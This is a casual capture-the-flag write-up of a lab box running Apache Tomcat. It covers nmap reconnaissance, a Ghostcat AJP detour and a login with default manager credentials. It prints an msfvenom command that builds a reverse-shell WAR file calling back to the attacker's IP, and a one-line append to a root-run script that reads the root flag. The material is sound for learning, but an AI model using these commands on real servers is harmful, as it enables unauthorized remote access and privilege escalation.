Just a simple boot to root box.

Lets start by navigating to the url.

Ok, I get an unable to connect to the server. Lets run nmap and see what we can find.

Nmap scan report for 10.10.203.251
Host is up (0.17s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
1272/tcp filtered cspmlockmgr
5904/tcp filtered unknown
8009/tcp open ajp13
8080/tcp open http-proxy
8649/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 96.05 seconds

Attempting to connect to 8080 and I get an SSL timeout error. Removing the HTTPs from the start of the url fixes this problem. (oops!)

If we do a little research, we can find that /manager/html has a login page.

Lets see if there are any other vulnerabilities for apache tomcat 8.5.5. Theres a python script that may work for rce. Tried it but it did not work.

Ok - lets take a step back and look at some of the other ports.I have never seen ajp before. AJP is used to allow efficient passing of binary representations of the headers between the proxy server and the app server.

Doing some research there seems to be a vulnerability called ghostcat that may exploit this protocol.

Ok - watched a john hammond video on ghost cat vuln and found an ajp shooter that works. I can read files off of the site. Now, we just need to find the installation directory.

Couldn’t find anything! Turns out i went down a rabbit hole. After i looked at a hint, lets go back to the manager login and try the default creds.

Remember folks, ALWAYS TRY THE DEFAULT CREDS. https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown

haha wow look im in.

There are a few different endpoints here and an ability to upload files/directories. There is a WAR file upload, lets see if we can exploit that.

https://null-byte.wonderhowto.com/how-to/hack-apache-tomcat-via-malicious-war-file-upload-0202593/

tried to use metasploit but it did not work. Lets try to do it manually.

msfvenom -p java/shell_reverse_tcp lhost=10.6.10.177 lport=9999 -f war -o pwn.war

That worked! Time to upgrade shell https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

nice, now we can read user.txt. Lets try to escalate privs or move laterally. Theres an interesting file thats running that runs as root and dumps it into a text file.

So, a normal human being would use a text editor to edit the file. But, here we use echo. append the following command to cause the script to read the root.txt located in the /root/root.txt directory.

echo -e ‘echo -e $(cat /root/root.txt » test.txt)’ » id.sh

yes, that is two echos. But it works! So after 2 hours and multiple wrong paths we have finished the box!

Thank you for following along with this adhd guide.